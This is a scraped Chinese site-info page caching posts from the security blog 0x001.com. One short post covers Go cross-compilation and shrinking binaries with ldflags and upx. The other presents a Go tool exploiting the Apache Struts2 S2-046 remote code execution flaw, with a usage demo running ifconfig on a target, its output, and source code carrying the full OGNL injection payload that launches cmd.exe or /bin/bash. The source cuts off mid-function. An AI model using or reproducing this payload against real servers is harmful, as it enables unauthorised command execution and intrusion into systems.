0x001.com
域名年龄: 15年5个月1天HTTP/1.1 200 OK 类型:text/html; charset=utf-8 服务器:GitHub.com 修改日期:2017年08月13日 00:55:04 网页标记:W/"598f32e8-19c40" Access-Control-Allow-Origin: * 过期时间:2019年07月06日 11:25:24 缓存控制:max-age=600 Content-Encoding: gzip X-Proxy-Cache: MISS X-GitHub-Request-Id: DE0C:78D2:1C1090:236E02:5D20124A 文件大小:17997 接受单位:字节 访问时间:2019年07月06日 11:15:24 代理服务器:1.1 varnish 文件时间(秒):0 连接:keep-alive X-Served-By: cache-ams21036-AMS 缓存代理:MISS X-Cache-Hits: 0 X-Timer: S1562382924.335132,VS0,VE97 动作:Accept-Encoding X-Fastly-Request-ID: 704d3ff13a94cc860250b6c68d21da45bbb0e356 网站编码:utf-8
0x001 Team网络安全爱好者首页归档分类标签关于留言搜索closegolang编译发表于2017-03-21|分类于golang|一、交叉编译只需设置 GOOS 和 GOARCH 两个环境变量就能生成所需平台的Go程序比如生成mac osx上可以执行的程序1[mac]# GOOS=darwin GOARCH=amd64 go build test.go所有可以交叉编译的OS和ARCH的值如下:$GOOS$GOARCHdarwin386darwinamd64darwinarmdarwinarm64dragonflyamd64freebsd386freebsdamd64freebsdarmlinux386linuxamd64linuxarmlinuxarm64linuxppc64linuxppc64lenetbsd386netbsdamd64netbsdarmopenbsd386openbsdamd64openbsdarmplan9386plan9amd64solarisamd64windows386windowsamd64二、编译文件最小化编译go文件,去掉符号信息和调试信息 -a 强制编译所有依赖包。 -s 去掉符号信息 -w 去掉DWARF调试信息,得到的程序就不能用gdb调试了1[mac]# go build -ldflags "-s -w" hello.goupx压缩文件1[mac]# upx -9 -k hellos2-046发表于2017-03-21|分类于Exploit|Struts2 远程执行漏洞利用程序使用golang实现的一个小工具使用方法:123456789101112system@mac:~/golang/src/s2-046$ ./main http://xxx.com/1.jsp ifconfig200map[Server:[Apache-Coyote/1.1] Date:[Tue, 21 Mar 2017 06:08:39 GMT]]eth0 Link encap:Ethernet HWaddr 52:54:E4:D1:15:00 inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::5054:e4ff:fed1:1500/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:9999952 errors:0 dropped:0 overruns:0 frame:0 TX packets:6667457 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:6575210434 (6.1 GiB) TX bytes:939669875 (896.1 MiB)源代码:12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273package mainimport ("bytes""flag""fmt""log""mime/multipart""net/http")/* 给body添加类似上传文件的mime/multipart内容 */func newMultipartRequest(url string, params map[string]string, cmd string) (*http.Request, error) {payload := "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)" +":((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensym" +"phony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())" +".(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().c" +"ontains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))." +"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOut" +"putStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b"body := &bytes.Buffer{}writer := multipart.NewWriter(body)_, err := writer.CreateFormFile("foo", payload)if err != nil {return nil, err}for key, v
© 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询
2024-05-20 03:10, Process in 0.0074 second.